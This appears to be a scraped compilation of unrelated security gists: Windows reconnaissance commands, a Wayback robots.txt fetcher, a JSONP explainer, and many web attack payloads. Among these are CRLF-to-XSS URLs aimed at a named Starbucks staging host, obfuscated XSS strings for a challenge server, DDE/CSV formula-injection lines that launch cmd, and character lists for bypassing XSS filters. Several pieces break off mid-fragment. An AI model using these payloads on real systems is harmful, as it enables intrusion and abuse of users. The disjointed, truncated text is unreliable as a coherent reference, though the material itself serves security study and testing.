What is the OS and architecture? Is it missing any patches?
systeminfo
wmic qfe
Is there anything interesting in environment variables? A domain controller in LOGONSERVER?
set
Get-ChildItem Env: | ft Key,Value
Are there any other connected drives?
nani1337 / Beyond SQLi: Obfuscate and Bypass.html
Created March 15, 2018 06:48
Beyond SQLi: Obfuscate and Bypass
|=--------------------------------------------------------------------=|
|=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------=|
|=-------------------------=[ 6 October 2011 ]=-----------------------=|
|=----------------------=[ By CWH Underground ]=--------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
nani1337 / Linux commands.py
Created March 6, 2018 11:04
Linux cheat sheet
###############
# Permissions #
###############
---------------------------Type This-----------------------------------
cd ~
pwd
ls
import requests
import re
import sys
from multiprocessing.dummy import Pool

def robots(host):
    # Ask the Wayback Machine CDX API for every archived copy of the host's
    # robots.txt that returned HTTP 200, deduplicated by content digest
    r = requests.get(
        'https://web.archive.org/cdx/search/cdx'
        '?url=%s/robots.txt&output=json&fl=timestamp,original'
        '&filter=statuscode:200&collapse=digest' % host)
    # The CDX API returns a JSON array of [timestamp, original] rows
    return r.json()
http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
http://185.45.192.228/xssChall/3.php?xss=hello%22%3E%3Cscript%3E(0)[%27constructor%27][%27constructor%27](%22\x61\x6c\x65\x72\x74(1)%22)();%3C/script%3Es
http://185.45.192.228/xssChall/4.php?xss=hello%22%22%3E%3E%3E%3Cscript%3Efor((i)in(self))eval(i)(1)%3C/script%3E%3EXxxxxx
http://185.45.192.228/xssChall/4.php?xss=%27%3E%3Cscript%3Eeval(atob(%22cHJvbXB0KDEpOw==%22))%3C/script%3E%3EXxxxxx
http://185.45.192.228/xssChall/4.php?xss=hello%22%22%3E%3E%3E%3Cscript%3Eeval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))%3C/script%3E%3EXxxxxx
http://185.45.192.228/xssChall/4.php?xss=hello%22%22%3E%3E%3E%3Cscript%3EparseInt(%22prompt%22,36);%3C/script%3E%3EXxxxxx
http://185.45.192.228/xssChall/6.php?xss=hello%22%3E%3Cscript%3E(0)[%27constructor%27][%27constructor%27](%22\141\154\145\162\164(1)%22)();%3C/script%3Es
http://185.45.192.228/xssChall/6.php?xss=hello%22%3E%3Cscript%3E(0)[%27constructor%27][%27constructor%27](%22\x61\x6c\x65\x72\x74(1)%22)();%3C/script%3Es
JSONP, short for JSON with Padding, is a JSON-based technique for requesting resources across domains. Its basic principle is to use the HTML <script></script> tag to load a remote JSON file and so transfer the data. To obtain b.com's JSON data (getUsers.JSON) from within the a.com domain:
{"id" : "1","name" : "知道创宇"}
b.com can first output getUsers.JSON with JSONP's "Padding" as:
callback({"id" : "1","name" : "知道创宇"});
In real applications the callback name is output dynamically by the back end. Continuing the above example in PHP:
<?php
//getUsers.php
nani1337 / csv
Last active August 2, 2019 07:06
=cmd|' /C calc'!A0
=cmd|'/k ipconfig'!A0
=HYPERLINK("http://linux.im?test="&A2&A3,"Error: Please click me!")
=cmd|' /C notepad'!'A1
=cmd|'/C ping -t 127.0.0.1 -l 25152'!'A1'
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
=2+5+cmd|' /C calc'!A0
;=2+5+cmd|' /C calc'!A0
var sock = new java.net.Socket();
sock.bind(new java.net.InetSocketAddress('0.0.0.0',0));
sock.connect(new java.net.InetSocketAddress(document.domain,(!document.location.port)?80:document.location.port));
alert(sock.getLocalAddress().getHostAddress());
<img src=x onerror=%character%alert(1)>
Firefox 3.0.8:
8,9,10,11,12,13,32,34,59,160,8192,8193,8194,8195,8196,8197,8198,8199,
8200,8201,8202,8203,8232,8233,12288,65279,65534
Opera 10.01:
9,10,11,12,13,32,59,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,
8200,8201,8202,8203,8232,8233,8239,12288,65279